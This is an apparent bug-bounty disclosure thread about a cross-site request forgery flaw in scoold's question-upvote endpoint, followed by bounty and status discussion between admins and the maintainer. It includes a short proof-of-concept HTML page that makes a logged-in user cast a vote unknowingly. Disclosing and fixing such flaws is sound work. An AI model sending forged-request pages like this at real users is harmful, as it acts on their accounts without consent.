Cross-Site Request Forgery (CSRF) in erudika/scoold

Valid
Reported on Jun 20th 2021

✍️ Description

The /voteup/question/* endpoint does not have a CSRF protection. This could be exploited by an attacker to manipulate votes in a question.

🕵️‍♂️ Proof of Concept

An attacker creates the following web page and sends a link to a logged in user.

// PoC.html
<html>
    <head>
        <meta name="referrer" content="no-referrer">
    </head>
<body>
    <a href="https://live.scoold.com/voteup/question/1279016709126098944">Click Here</a> 
</body>
</html>

When an authenticated user clicks the link, a vote is made on behalf of the user without the user actually knowing.

Prevention

This attack could be easily prevented by requiring a valid CSRF token to validate the click.

Ziding Zhang
a month ago

Admin


Hey @oomb, since I couldn't find a security policy or contact email address on the repository, I've created an issue asking for a way to responsibly inform them of this vulnerability. Waiting to hear back, good job!

Alex Bogdanovski validated this vulnerability a month ago
Yadhu M has been awarded the disclosure bounty
$25
The fix bounty is now up for grabs
$6.25
Alex Bogdanovski confirmed that a fix has been merged on 5f2438 a month ago
The fix bounty has been dropped
$6.25
Ziding Zhang
a month ago

Admin


Thank you Alex! May I kindly ask whether there is a reason that you wished not to claim the fix bounty? Your feedback would be much appreciated, thanks 🙏

Alex
a month ago

Maintainer


I still can't understand how this site works... Are these rewards supposed to support maintainers for fixes like this? Anyways, our projects are fully funded by our backing company so that reward is irrelevant to me.

Alex
a month ago

Maintainer


Also I've just noticed that my profile says "0 fixes" - how come?

Alex
a month ago

Maintainer


Oops! Is this a bug?

Jamie Slome
a month ago

Admin


Hello Alex, we allow the maintainer to select themselves as the fixer if they patched the vulnerability themselves. When you confirm the fix, you need to just select yourself as the fixer. This will also reflect the fix on your profile.

With regards to the above, do you want this advisory to be marked as valid or invalid?

Alex
a month ago

Maintainer


Thanks for clarifying that Jamie! The report is valid for sure. I was just playing around and managed to click the disabled "mark as invalid" button, which should not have had any effect but it did.

Jamie Slome
a month ago

Admin


@Alex, apologies for the confusion. From a data perspective, it hasn't actually been reflected as invalid. I will remove the above statuses to prevent confusion when viewing the page.

I will also make sure the mark as invalid button is disabled once the status is set.

Alex
a month ago

Maintainer


Yes, that's a good idea. Thanks again for the support!

Jamie Slome
a month ago

Admin


No worries!